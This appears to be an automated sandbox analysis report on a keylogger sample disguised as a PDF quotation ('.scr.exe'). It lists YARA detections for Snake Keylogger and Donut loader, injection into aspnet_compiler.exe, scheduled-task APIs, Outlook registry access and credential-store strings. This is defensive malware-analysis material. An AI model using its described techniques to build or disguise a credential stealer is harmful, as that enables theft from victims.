Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2638636004.000001195F083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@4/3

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2172:120:WilError_03

Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FC6E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FC60000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FC9E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3322004150.000001F5AFA37000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FC50000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FCAA000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe"
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EF9F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638577443.000001195EB30000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EBB1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EC01000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EF9F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638577443.000001195EB30000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EBB1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EC01000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195d1a0000.0.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195d1a0000.0.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195d1a0000.0.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195d1a0000.0.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195d1a0000.0.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196eeae2f8.8.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196eeae2f8.8.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196eeae2f8.8.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196eeae2f8.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196eeae2f8.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

